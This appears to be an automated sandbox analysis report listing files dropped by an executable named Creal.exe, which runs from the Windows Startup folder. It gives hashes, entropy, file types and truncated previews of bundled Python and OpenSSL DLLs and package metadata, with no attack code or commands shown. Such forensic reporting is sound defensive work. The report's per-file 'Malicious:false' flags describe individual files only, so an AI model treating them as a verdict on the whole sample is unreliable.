                                                                                                                                                                                                                                                      Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\cryptography\hazmat\bindings\_rust.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7834624
                                                                                                                                                                                                                                                      Entropy (8bit):6.517862303223651
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:49152:oFNZj7fIo9W67PapgzJTkrXyzNzpXAbuiqCgIns3mYEXEqMrIU6i7GtlqdVwASO/:QI9X/gIFYEXME+oFNr5VQCJheq4BsxH
                                                                                                                                                                                                                                                      MD5:BFD28B03A4C32A9BCB001451FD002F67
                                                                                                                                                                                                                                                      SHA1:DD528FD5F4775E16B2E743D3188B66F1174807B2
                                                                                                                                                                                                                                                      SHA-256:8EF0F404A8BFF12FD6621D8F4F209499613F565777FE1C2A680E8A18F312D5A7
                                                                                                                                                                                                                                                      SHA-512:6DC39638435F147B399826E34F78571D7ED2ED1232275E213A2B020224C0645E379F74A0CA5DE86930D3348981C8BB03BBBECFA601F8BA781417E7114662DDEE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.b.6...6...6...?..$...&9..4...&9..2...&9..>...&9..'...}...8...Y<..5...6...2...~8..I...6.......~8..7...~8..7...Rich6...........PE..d......g.........." ...)..Y..$........W.......................................w...........`..........................................q.....l.q.............. s...............w......zi.T....................{i.(...Pyi.@.............Y..............................text...k.Y.......Y................. ..`.rdata...A....Y..B....Y.............@..@.data...@+....q.......q.............@....pdata....... s.......r.............@..@.reloc........w.......v.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\libcrypto-3.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5232408
                                                                                                                                                                                                                                                      Entropy (8bit):5.940072183736028
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                                                                      MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                                                                      SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                                                                      SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                                                                      SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\libffi-8.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):39696
                                                                                                                                                                                                                                                      Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                                      MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                                      SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                                      SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                                      SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\libssl-3.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):792856
                                                                                                                                                                                                                                                      Entropy (8bit):5.57949182561317
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                                                                      MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                                                                      SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                                                                      SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                                                                      SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\pyexpat.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):201488
                                                                                                                                                                                                                                                      Entropy (8bit):6.375994899027017
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:cAPHiRwroqoLHMpCSNVysh9CV2i6P/1vTg:6wrExSU6PdvTg
                                                                                                                                                                                                                                                      MD5:CF2C3D127F11CB2C026E151956745564
                                                                                                                                                                                                                                                      SHA1:B1C8C432FC737D6F455D8F642A4F79AD95A97BD3
                                                                                                                                                                                                                                                      SHA-256:D3E81017B4A82AE1B85E8CD6B9B7EB04D8817E29E5BC9ECE549AC24C8BB2FF23
                                                                                                                                                                                                                                                      SHA-512:FE3A9C8122FFFF4AF7A51DF39D40DF18E9DB3BC4AED6B161A4BE40A586AC93C1901ACDF64CC5BFFF6975D22073558FC7A37399D016296432057B8150848F636E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P.P.P.(t..P...P...P...P...P....P..(.P.P..P....P....P......P....P.Rich.P.........................PE..d.....g.........." ...)..................................................... ............`............................................P... ............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\python3.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):70416
                                                                                                                                                                                                                                                      Entropy (8bit):6.1258200129869405
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
                                                                                                                                                                                                                                                      MD5:16855EBEF31C5B1EBE767F1C617645B3
                                                                                                                                                                                                                                                      SHA1:315521F3A748ABFA35CD4D48E8DD09D0556D989B
                                                                                                                                                                                                                                                      SHA-256:A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
                                                                                                                                                                                                                                                      SHA-512:C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\python313.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6083856
                                                                                                                                                                                                                                                      Entropy (8bit):6.126922729922386
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
                                                                                                                                                                                                                                                      MD5:B9DE917B925DD246B709BB4233777EFD
                                                                                                                                                                                                                                                      SHA1:775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
                                                                                                                                                                                                                                                      SHA-256:0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
                                                                                                                                                                                                                                                      SHA-512:F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\select.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):30992
                                                                                                                                                                                                                                                      Entropy (8bit):6.554484610649281
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
                                                                                                                                                                                                                                                      MD5:20831703486869B470006941B4D996F2
                                                                                                                                                                                                                                                      SHA1:28851DFD43706542CD3EF1B88B5E2749562DFEE0
                                                                                                                                                                                                                                                      SHA-256:78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
                                                                                                                                                                                                                                                      SHA-512:4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\INSTALLER

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                      MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                      SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                      SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                      SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\LICENSE

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11358
                                                                                                                                                                                                                                                      Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                                      MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                                      SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                                      SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                                      SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\METADATA

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4648
                                                                                                                                                                                                                                                      Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                                                      MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                                                      SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                                                      SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                                                      SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\RECORD

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2518
                                                                                                                                                                                                                                                      Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                                                      MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                                                      SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                                                      SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                                                      SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\WHEEL

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                      Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                                                      MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                                                      SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                                                      SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                                                      SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):19
                                                                                                                                                                                                                                                      Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                                                      MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                                                      SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                                                      SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                                                      SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:importlib_metadata.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1335
                                                                                                                                                                                                                                                      Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                                                      MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                                                      SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                                                      SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                                                      SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
